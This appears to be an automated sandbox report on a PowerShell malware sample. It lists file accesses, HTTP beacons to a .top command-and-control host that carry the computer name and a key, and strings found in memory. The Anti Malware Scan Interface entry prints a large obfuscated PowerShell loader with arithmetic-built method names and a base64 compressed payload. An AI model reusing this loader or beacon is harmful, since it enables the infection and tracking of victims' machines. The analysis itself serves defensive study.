Click to jump to signature section
Source: | Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.663085801790.0000021A36A40000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: mscorlib.pdberShell.Commands.Utility.pdb1-F424491E3931}\InprocServer32 source: powershell.exe, 00000002.00000002.663052507532.0000021A1C998000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: softy.pdbllj= source: powershell.exe, 00000002.00000002.663090567187.0000021A3709E000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.663088206745.0000021A36E04000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: utomation.pdbdb source: powershell.exe, 00000002.00000002.663088206745.0000021A36D60000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Management.Automation.pdbh source: powershell.exe, 00000002.00000002.663052507532.0000021A1C998000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: scorlib.pdba-k[ source: powershell.exe, 00000002.00000002.663088206745.0000021A36D60000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbR source: powershell.exe, 00000002.00000002.663089995476.0000021A36E5C000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbl source: powershell.exe, 00000002.00000002.663089995476.0000021A36E5C000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: *on.pdbdw source: powershell.exe, 00000002.00000002.663085801790.0000021A36ABE000.00000004.00000020.00020000.00000000.sdmp |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | HTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Connection: Keep-Alive |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | HTTP traffic: GET /sorry/index?continue=http://www.google.com/&q=EgRmgZjNGI2VoLsGIjD67lPq7j91CFvVoDyfLmk3ebYGs4fSwa7kJc5SKfazqapl2GCINOoUmaA8KQ9bx1gyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Cookie: NID=520=R06Okk43pnG38XsvEyzgB83qthqG2UUmOxWqGdorYa9lglds2TA-1tpHAbBY52hGQ_9c6KFN-ZAJv6x-gG9kxwmZdrrPUluwxFNVgQTU8AlsMoc6ZxZc6GUGZWuFdDktmRPCtVfvWJBDQQpI_30dcxrBY1jy-RZBTDGbohYWF3ugPnE4XhJjBb9V4AAR2ekGbbVS |
Source: global traffic | HTTP traffic detected: GET /mes6v8wj5phtr.php?id=computer&key=28342894733&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cmacnnkfbhlcncm.topConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgRmgZjNGI2VoLsGIjD67lPq7j91CFvVoDyfLmk3ebYGs4fSwa7kJc5SKfazqapl2GCINOoUmaA8KQ9bx1gyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comCookie: NID=520=R06Okk43pnG38XsvEyzgB83qthqG2UUmOxWqGdorYa9lglds2TA-1tpHAbBY52hGQ_9c6KFN-ZAJv6x-gG9kxwmZdrrPUluwxFNVgQTU8AlsMoc6ZxZc6GUGZWuFdDktmRPCtVfvWJBDQQpI_30dcxrBY1jy-RZBTDGbohYWF3ugPnE4XhJjBb9V4AAR2ekGbbVS |
Source: global traffic | HTTP traffic detected: GET /mes6v8wj5phtr.php?id=computer&key=28342894733&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cmacnnkfbhlcncm.topConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgRmgZjNGI2VoLsGIjD67lPq7j91CFvVoDyfLmk3ebYGs4fSwa7kJc5SKfazqapl2GCINOoUmaA8KQ9bx1gyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comCookie: NID=520=R06Okk43pnG38XsvEyzgB83qthqG2UUmOxWqGdorYa9lglds2TA-1tpHAbBY52hGQ_9c6KFN-ZAJv6x-gG9kxwmZdrrPUluwxFNVgQTU8AlsMoc6ZxZc6GUGZWuFdDktmRPCtVfvWJBDQQpI_30dcxrBY1jy-RZBTDGbohYWF3ugPnE4XhJjBb9V4AAR2ekGbbVS |
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1F9F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.663053799764.0000021A1FB96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.663053799764.0000021A1FA66000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$o91mkbr7ed3vtf6/$32nxepuvb0gay75.php? |
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1EB5B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$o91mkbr7ed3vtf6/$32nxepuvb0gay75.php?id=$env:computername&key=$xcdjnwvua&s=527 |
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1F858000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.663053799764.0000021A1F7D7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cmacnnkfbhlcncm.top |
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1F7D7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cmacnnkfbhlcncm.top/mes6v8wj5phtr.php?id=computer&key=28342894733&s=527 |
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1F7D7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cmacnnkfbhlcncm.top/mes6v8wj5phtr.php?id=computer&key=28342894733&s=527p |
Source: powershell.exe, 00000002.00000002.663085801790.0000021A36ABE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06 |
Source: powershell.exe, 00000002.00000002.663085801790.0000021A36A8E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: powershell.exe, 00000002.00000002.663087374251.0000021A36BB0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.mic |
Source: powershell.exe, 00000002.00000002.663088206745.0000021A36D26000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoO |
Source: powershell.exe, 00000002.00000002.663075653155.0000021A2EAEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.663075653155.0000021A2E9A7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1EB5B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1EB5B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.pngXz |
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1EB5B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/ |
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1E931000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1EB5B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/ |
Source: powershell.exe, 00000002.00000002.663090479972.0000021A37020000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://wwcrosoft.com/pki/certs/MicWinPCA_2010-07-06.crt0 |
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1EB5B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1EB5B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz |
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1F858000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.663053799764.0000021A1F877000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.663053799764.0000021A1F862000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com |
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1FA66000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/ |
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1F877000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/&q=EgRmgZjNGI2VoLsGIjD67lPq7j91CFvVoDyfLmk3ebYGs4fSwa7kJc5SKfazqapl2GCINOoUmaA |
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1F862000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgRmgZjNGI2VoLsGIjD67lPq7j91CFvV |
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1E931000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000002.00000002.663075653155.0000021A2E9A7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000002.00000002.663075653155.0000021A2E9A7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000002.00000002.663075653155.0000021A2E9A7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1F862000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp |
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1EB5B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1EB5B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/PesterXz |
Source: powershell.exe, 00000002.00000002.663075653155.0000021A2EAEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.663075653155.0000021A2E9A7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1F858000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.663053799764.0000021A1F877000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.663053799764.0000021A1F889000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/recaptcha/api.js |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7680:304:WilStaging_02 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7680:120:WilError_03 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $ygi8e15xtdl6k2c.((-join (@((6829-6762),(86691/(5492-(13082447/2777))),(-4549+4661),(877855/(3417+(5722458/1491))),(-3224+3308),(-5216+5327))| ForEach-Object { [char]$_ })))( $fxb4tonc1di39mu ) $ygi8e15xtdl6k2c.(([system.String]::new(@((219023/(21722505/6645)),(891540/8255),(-6561+(64424832/(21774280/2255))),(-5726+5841),(4886-(8169-3384))))))()$5teju2orbwapdgq.(([char[]]@((7253-(11996-(12431-(59001782/7742)))),(-5740+(11936-(5419+(1103850/1650)))),(594849/(-3209+8568)),(-1852+(10186-(10384-2165))),(2284-2183)) -join ''))()[byte[]] $anxc5tg2wm9u86b = $fxb4tonc1di39mu.(([char[]]@((-6992+7076),(-141+(167328/(1171296/1764))),(-3238+(-1990+(52125464/(10090-242)))),(384408/3372),(838698/(-1153+(14176-5666))),(864561/8913),(-7252+(288+7085))) -join ''))() $atq3ip6evlnohyk=$anxc5tg2wm9u86b return $atq3ip6evlnohyk}[System.Text.Encoding]::ascii.(([char[]]@((335049/(7727-(10627264/3533))),(-7915+8016),(-10011+10127),(335-252),(-5939+(1234+4821)),(466-(2345376/6663)),(7803-7698),(174130/1583),(-4207+4310)) -join ''))((hz1cnubfqdw7jvkyo3gs6xi5m0e "ZuB6aWpjN3VgYtnrIgRuPhikqFYkvRUQSdBBAN2Z61py5nCoHZjmNEod//ZFZmBF6wM5zSbyoZGvFbufJsz1e0+yhWPldS7iSrgPk/bJyNDOhJrtwp2tuLmE0Prq/QvDBpCKhZ6q/NJb3c0IjYsalgwcRQAdGAoGCxUE0BUQToqMGguBhYGH6occ2VqDnQ6J7phlRsVNwGK7PGovJ9aotLEd3UeT1KvtRVDMkYSC9Aq/DMfbFyXPjbe07GMY/+8H7PQxxBS9zZUZ+A9aB6ytj44wqyesK8uUL6DmEuGZ8uI+RSsbmvxgCx8NHqRdHP9eHUWWEak/XPzeMr1RtU4LFP44+ylI2EAdRDw61fq4+atyGOs7CSod4qtOaUrxeJYswaIc3vPcCEpZuYiJtlebHsW9ic+43cyHlI63gLOwsKoYEcIPxL5xf3TpHJKm1yjGgqRO/PEfHy8EScWVy9u2P7bfekSD9q7C5BCfRaPGI5JJbSfXFJirpk81GhoDKegTNBX4RICidLpFW0ppE+cO3b2znTqvVBBu25txwoT2KM+XF8kyGdSViQawUMPzKUIty5xM/7AAqvdyrFLE6Qdf+nTCoBx/KRuDz61ujwcHTuSJgELBg7cvicsxPOCXbx0HxI2eKw/6nkNJGHrONFqarqag+0wwzYOtz8ppB7e/Ixkls9PSXmXbjfQo5Pa9bAPeQRgldDLJvXTS59d+FSD/tJHSGljwvqiiKxwRBLfWYwF8pmSrJxjuC6Md20A1eFKG1uYtC4t0bDMCGd6j3mHFjC756Zo5zGiZu1IUstY1G2X/+S/bb7rPfXQC3shg6Y0on6uU5BeMtgiLJ6MXVvZPKOYCHQgg8xu1EtzpGrt0Wh0Qgcq5POmnLBHL6qhfzSrvJ/VOsnQ+aSmJFcusxJg91sYajOyTXRqcttQfF1MZRIecmcenRjZvJmVVbHfnqqBOU2h6+/o6dlrROnABDqXsjkMuxudzvQempH38WJCNbyXKWIKL4ixlkol82RoamYS2IoY7HDks/obdKIr/LaPs4Y+aoJf/YJOTvHpJV9tEPfAJjto2/D99U60a7C830MXhxhiFyk2k+CoZgM15IMvXeApegmO8P8JIPPVHGFwQ/6u/AY6k8BbEyrff/Bpi/I+n1jVMEJYDXLWcXVs+hpWakpeq0hOXCzRsQUnK8TGpU89j/0yYSRv9YZgwEMNpzRY+lTqFp42JoFjvRuhL/rjQbiohmdBQn5oDV/IPGYN5GR+VE95Kbg5siSpFJOXg13XqGd5VK6ZG8kBrrhcH2wC8DbCjV9cmizuQc0CK2tgD+uVyZn71+bwHaKDK8m0jtCOSR/yYhNCDMjT3ZQ |